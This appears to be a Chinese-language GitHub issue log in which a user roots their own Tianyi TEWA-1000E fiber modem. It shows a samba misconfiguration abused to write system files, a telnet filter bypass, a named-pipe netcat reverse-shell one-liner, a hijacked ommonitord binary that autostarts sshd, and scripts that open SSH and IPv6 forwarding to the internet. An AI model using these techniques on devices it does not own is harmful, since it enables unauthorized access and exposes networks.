You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
$wget
Error!
#直接运行wget会报错,但是通过bash的手执行就是正常的...说明我们根本就没有在正常的shell...
$bash -c 'wget'
BusyBox v1.28.3 (2021-08-12 18:03:54 CST) multi-call binary.
Usage: wget [-cq] [-O FILE] [-Y on/off] [-P DIR] [-S] [-U AGENT] [-T SEC] URL...
Retrieve files via HTTP or FTP
-c Continue retrieval of aborted transfer
-q Quiet
-P DIR Save to DIR (default .)
-S Show server response
-T SEC Network read timeout is SEC seconds
-O FILE Save to FILE ('-' for stdout)
-U STR Use STR for User-Agent header
-Y on/off Use proxy
#!/bin/sh
FLAG_FILE=/var/ommonitord_first_run.log
if [ ! -f $FLAG_FILE ]; then
date > $FLAG_FILE
/opt/upt/apps/ssh/start_ssh.sh &
fi
cd /opt/upt/apps/apps/opt/apps/opmaintain/diagapps
./ommonitord_stock "$@"
# ip -6 rule list
0: from all lookup local
102: from all fwmark 0x40000000/0xe0000000 lookup 102
102: from 240e:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx lookup 102
32766: from all lookup main
# ip -6 route list table 102
fe80::/64 dev br0 metric 1024 pref medium
default via fe80::xxxx:xxxx:xxxx:xxxx dev ppp1.2 proto ra metric 1024 expires 1511sec pref medium
ip -6 rule list里第三条规则会让从光猫本地发出的包强制走102号路由表,但是102号路由表又只允许ppp1.2出站,这会让在br0侧的局域网设备连不上光猫的IPv6 ssh,也ping不同。解决方法是干掉那行102: from 240e:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx lookup 102:
IP6=$(ip -6 a show ppp1.2 | grep 'global' | grep -v 'link' | grep -vE 'fc00::/7|fd[[:xdigit:]]' | awk '{print $2}' | cut -d'/' -f1)
ip -6 rule list | grep $IP6 | grep 'lookup 102' && ip -6 rule del from $IP6 lookup 102
#!/bin/sh
# This script modifies the IPv6 firewall to open ports
open_ipv6_tcp_port() {
if ip6tables -S INPUT | grep -Fe "-A INPUT -p tcp -m tcp --dport $1 -j ACCEPT" > /dev/null; then
echo "TCP port $1 has been opened already!"
else
ip6tables -I INPUT 1 -p tcp -m tcp --dport $1 -j ACCEPT
echo "Open TCP port $1"
fi
}
# Fix the routing table by removing the unhealthy rule,
# otherwise PCs on LAN cannot connect to us via IPv6.
# Normally, we should not reject any connection from LAN.
IP6=$(ip -6 a show ppp1.2 | grep 'global' | grep -vE 'fc00::/7|fd[[:xdigit:]]{2,4}' | awk '{print $2}' | cut -d'/' -f1)
if [ -z "$IP6" ]; then
echo "Cannot find a valid public IPv6 address, abort!"
exit 1
fi
echo "IPv6: $IP6"
if ip -6 rule list | grep -Fe $IP6 | grep 'lookup 102' > /dev/null; then
ip -6 rule del from $IP6 lookup 102
echo "Unhealthy routing rule has been removed."
fi
# Change IPv6 firewall rules
# Enable Ping from the Internet
if ip6tables -S INPUT | grep -Fe "-A INPUT -i ppp1.2 -p icmpv6 -m icmp6 --icmpv6-type 128 -j ACCEPT" > /dev/null; then
echo "Ping is allowed."
else
ip6tables -I INPUT -i ppp1.2 -p icmpv6 -m icmp6 --icmpv6-type 128 -j ACCEPT
ip6tables -D output_firewall -o ppp1.2 -p icmpv6 -m icmp6 --icmpv6-type 129 -j DROP > /dev/null 2>&1
echo "Ping has been enabled from the Internet."
fi
# Enable IPv6 forwarding from the Internet to LAN
# Warning: This will expose all your devices to the Internet!
# Please remember that the public Internet can be hostile,
# and make sure all of your devices have properly configured IPv6 firewall!
ip6tables -D forward_firewall -i ppp1.2 -j DROP > /dev/null 2>&1
# Enable ssh inbound (to this device only) from any interfaces
open_ipv6_tcp_port 22
exit 0
#!/bin/sh
# Function to get the current global IPv6 address of eth0
get_ipv6() {
ip -6 a show ppp1.2 | grep 'global' | grep -vE 'fc00::/7|fd[[:xdigit:]]{2,4}' | awk '{print $2}' | cut -d'/' -f1
}
on_ipv6_changed() {
/opt/upt/apps/fix_ip6tables.sh "$1"
# Update Cloudflare DDNS record once, async
/opt/upt/apps/update_cf_ddns.sh "$1" &
}
# Initialize previous_ip with nothing
previous_ip=""
while true; do
# Get the current IPv6 address
current_ip=$(get_ipv6)
# Check if the current IP is different from the previous IP
if [ "$current_ip" != "$previous_ip" ]; then
# Update previous_ip to current_ip
previous_ip="$current_ip"
# Check if current_ip is not empty
if [ -n "$current_ip" ]; then
echo "IPv6 has changed to $current_ip, updating..."
on_ipv6_changed "$current_ip"
else
echo "Unable to detect IPv6 address at $(date)" > /var/monitor_ip6.log
fi
else
echo "No change in IPv6 address."
fi
# Wait for sometime before checking again
sleep 10
done
然后把fix_ip6tables.sh改为:
#!/bin/sh
# This script modifies the IPv6 firewall to open ports
open_ipv6_tcp_port() {
if ip6tables -S INPUT | grep -Fe "-A INPUT -p tcp -m tcp --dport $1 -j ACCEPT" > /dev/null; then
echo "TCP port $1 has been opened already!"
else
ip6tables -I INPUT 1 -p tcp -m tcp --dport $1 -j ACCEPT
echo "Open TCP port $1"
fi
}
if [ $# -lt 1 ]; then
echo "Please supply the current IPv6 as the argument"
exit 1
fi
IP6=$1
# Fix /etc/resolv.conf
echo 'nameserver ::1' > /etc/resolv.conf
# Fix the routing table by removing the unhealthy rule,
# otherwise PCs on LAN cannot connect to us via IPv6.
# Normally, we should not reject any connection from LAN.
if ip -6 rule list | grep -Fe $IP6 | grep 'lookup 102' > /dev/null; then
ip -6 rule del from $IP6 lookup 102
echo "Unhealthy routing rule has been removed."
else
echo "Unhealthy routing rule was not found, skip."
fi
# Change IPv6 firewall rules
# Enable Ping from the Internet
if ip6tables -S INPUT | grep -Fe "-A INPUT -i ppp1.2 -p icmpv6 -m icmp6 --icmpv6-type 128 -j ACCEPT" > /dev/null; then
echo "Ping is allowed."
else
ip6tables -I INPUT -i ppp1.2 -p icmpv6 -m icmp6 --icmpv6-type 128 -j ACCEPT
ip6tables -D output_firewall -o ppp1.2 -p icmpv6 -m icmp6 --icmpv6-type 129 -j DROP > /dev/null 2>&1
echo "Ping has been enabled from the Internet."
fi
# Enable IPv6 forwarding from the Internet to LAN
# Warning: This will expose all your devices to the Internet!
# Please remember that the public Internet can be hostile,
# and make sure all of your devices have properly configured IPv6 firewall!
ip6tables -D forward_firewall -i ppp1.2 -j DROP > /dev/null 2>&1
echo "Exposed IPv6 on LAN to the Internet."
# Enable ssh inbound from any interfaces
open_ipv6_tcp_port 22
exit 0
网上的
天邑su工具
和TelnetClient.exe
都不好用,勾选计算su会闪退...感觉只能另辟蹊径了。
网上的教程可以轻松获取超级管理员密码以及telnet权限,但是telnet登录后默认是用户,没有root,也不知道su的密码。
参考
20240402更新 - 初次尝试
现在找到了不获取su密码的情况下拿到root权限的方法。本方法利用了samba自身的bug实现。
我发现提供文件共享的samba居然是用root运行的,其配置文件
/var/samba/smb.conf
(内存文件)可由用户读写。于是我设想可以修改/var/samba/smb.conf
,让samba允许远程客户端读写光猫的root目录/
,然后以root权限去修改系统文件达到获得root权限的目的。echo $USER
会返回telnet-user,这是我们默认情况下telnet登录的用户,只拥有最基本权限。/var/samba/smb.conf
加料,运行如下命令/var/samba/smb.conf
文件会生效。sudo mount -t cifs -o rw,username=useradmin,password=光猫背后密码 //192.168.1.1/ty_root /tmp/ty_root
来连接。sudo /tmp/ty_root/var/group
来编辑。最后group文件看起来是这样:ip
之类的。iptables
和ip6tables
这些命令需要root用户,暂时无解。20240403更新 - 瞎猫碰到死耗子
瞎猫碰到死耗子了...现在有免su密码直接拿到root的方法,简单到难以置信...首先按照常规方式登录telnet,之后打一个
;
并回车,此时会报错:sh: syntax error: unexpected ";"
,不用管它,这时执行命令echo $USER
,就发现我们是root了2333333iptables
和ip6tables
这些之前无法执行的指令也可以执行了。具体原理未知,感觉像是telnet上去之后是某种程序在过滤我们的指令,理由如下:
此外,直接在telnet中运行su,需要的密码就是su密码,与
/etc/passwd
中记载的su密码并不一样。更改/etc/passwd
中的密码hash值并不能更改su密码,这点很令人费解。但是/etc/passwd
的密码在dropbear中是可以使用的。运行dropbear需要通过netcat来把dropbear传到光猫上(建议在/var
目录中),并附带一个host key(例如dropbear_rsa_host_key
)。用在telnet中使用root用户运行./dropbear -F -p 2222 -K 300 -T 3 -r dropbear_rsa_host_key
即可启动dropbear,端口2222。Reverse Shell
既然知道Telnet里输入命令有过滤,那就需要另一种方式访问shell。首先在你的Linux PC(假设是192.168.1.100)上运行
netcat -lvp 11451
,然后在光猫telnet中(假设telnet-user已加入root组)运行rm -f /var/fff;mknod /var/fff p;cat /var/fff|/bin/sh -i 2>&1|nc 192.168.1.100 11451 >/var/fff
。此时,Linux PC上的netcat将接管shell。这样操作起来会方便不少。20240404更新 - 加入ssh,更方便的root shell
将openssh服务器以及其配置放入永久储存,比telnet更加方便。目前不能做到自启动,每次重启光猫之后都需要重复20240402和20240404更新的所有操作。以下所有操作基于基于20240402更新。
/tmp/ty_root/var/samba/smb.conf
,在我们之前加的[ty_root]
字段最后增加一行root preexec = /opt/upt/apps/ssh/start_ssh.sh
。最终看起来是这样的:USB_disc1
那项是我的u盘,你的u盘名字可能不一样,不需要在意。2. 新建文件夹
/tmp/ty_root/opt/upt/apps/ssh/
,并将sshd_aarch64.tar.gz里的三个文件放入其中:sudo umount /tmp/ty_root
/opt/upt/apps/ssh/start_ssh.sh
会被自动执行,该脚本会修正ssh相关文件的所有权、建立所需要的目录,然后如果发现sshd没有启动则启动之。ssh [email protected]
即可免密码登录ssh,此shell具有root权限,请务必小心使用!这里的shell是可以执行'iptables'和'ip6tables'命令的。声明
sshd_aarch64.tar.gz
中的sshd为aarch64架构的静态可执行ELF文件,我是从alex-sector/static-binaries找的。如果怕不安全就自己编译吧。start_ssh.sh
已经做到了。start_ssh.sh
只会启动一次sshd。开机自启sshd
经过上面的步骤,虽然sshd留在了flash上,重启也还在,但是光猫重启之后并不能自行启动。于是参考0neday/OptiXstarHS8145X6,我们可以把
/opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord
替换为我们自己的脚本,然后只在其第一次运行时尝试启动ssh服务器,并且该脚本在任何时候运行都会运行原来的ommonitord,这样就不耽误功能了。首先通过ssh的方式拿到root shell,之后把ommonitord改名:
mv /opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord /opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord_stock
然后把我们自己的脚本放到
/opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord
那里:别忘了,需要给可执行权限:
chmod +x /opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord
现在重启之后,光猫会自动运行ssh,此时直接ssh登录即可。注意,这时LAN侧只能用IPv4登录(
ssh [email protected]
),WAN侧可用IPv6登录光猫。这猫路由有问题,LAN侧设备默认不能通过IPv6访问这猫,修复方法在后面有说。在光猫的IPv6防火墙上打洞
在默认情况下,光猫的IPv6防火墙出于安全因素,会Drop掉所有的IPv6入站连接。有些光猫可以通过普通用户或者超级管理员来关闭IPv6防火墙,但是TEWA-1000E的管理页面里没有这些选项,于是需要拿到root shell来手动配置。
现在国内用户,如果没有办过特殊的网络套餐,基本都是NAT IPv4加公网IPv6的方案,因此只需要考虑IPv6的入站即可。而且毕竟IPv6战未来。
对互联网开放光猫的ssh端口
其中ppp1.2是光猫上对应互联网的网络接口,可通过
ip a
查看ip6tables -I INPUT 1 -i ppp1.2 -p tcp -m tcp --dport 22 -j ACCEPT
对局域网开放光猫的ssh端口
不知为何,该光猫的路由规则里有这么一条(第二条102):
ip -6 rule list
里第三条规则会让从光猫本地发出的包强制走102号路由表,但是102号路由表又只允许ppp1.2出站,这会让在br0侧的局域网设备连不上光猫的IPv6 ssh,也ping不同。解决方法是干掉那行102: from 240e:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx lookup 102
:这样从本机发出的包就会正常按主路由表来走,局域网侧的IPv6 ssh以及IPv6 ping就通了。
允许互联网ping光猫
只允许Ping,安全
允许所有ICMP(可能有风险,强烈不推荐)
开放IPv6 Forward,允许光猫后面的PC被公网通过IPv6访问到
这种情况下一定要确保后面每一个设备都正确配置防火墙,不要把不该暴露的服务不小心暴露在公网上!可以用匹配IPv6后缀以及端口的方法只暴露最少的端口减少被攻击面,具体怎么做可以上网查查。
让ip6tables修改持久
暂未找到方法,这个光猫的rootfs是squashfs,只读的。只能看看
/etc/init.d/
里的脚本有没有自动执行那些可读写分区的操作了。20240411更新 - ip6tables持久化
上面开启IPv6防火墙端口和转发的方法,其效果会在重启后消失,因为Linux的iptables不是持久的,需要每次都手动修改。因此我们可以使用一个启动脚本来实现:
将上述内容存为
/opt/upt/apps/fix_ip6tables.sh
,然后在上面改的/opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord
脚本的date > $FLAG_FILE
之后加入一行[ -f /opt/upt/apps/fix_ip6tables.sh ] && /opt/upt/apps/fix_ip6tables.sh
即可但是这样做有个潜在问题,如果光猫没有重启但是IPv6改变了怎么办呢?找了一圈,似乎光猫上没有明文的用于更新ip6tables的脚本。我的注意力在
/bin/smd
这个二进制程序上,因为这里提到了这个/bin/smd
是某种“主进程”,并且其负责拉起DHCP服务并根据用户配置产生dhcpd的配置文件。所以我感觉防火墙可能也是这个程序根据某种用户配置文件自动配置的或者是硬编码在里面的。这个可能可以利用下:
https://www.bilibili.com/read/cv17822838/
https://www.cnblogs.com/geyee/p/15915361.html
https://www.cnblogs.com/tianpanyu/p/15611523.html
https://www.chinadsl.net/thread-166731-1-1.html
https://www.chinadsl.net/forum.php?mod=viewthread&action=printable&tid=158737
https://bbs.kanxue.com/thread-278640.htm
20240704更新 - 自动更新IPv6
前面提到的步骤在光猫拿到的IPv6出于某种原因变更之后并不会自动更新,因此需要弄一个后台一直在运行的脚本进行周期性检查。首先新建
/opt/upt/app/monitor_ip6.sh
,内容如下:然后把
fix_ip6tables.sh
改为:这里主要的改动是让
fix_ip6tables.sh
从monitor_ip6.sh
里拿到最新的IPv6,并且只有在IPv6发生改变之后才会运行一次。最后的最后,我们需要修改先前脚本的
/opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord
,使之不直接调用/opt/upt/apps/fix_ip6tables.sh
,而是把/opt/upt/app/monitor_ip6.sh
拉到后台去运行。具体ommonitord
内容如下:The text was updated successfully, but these errors were encountered: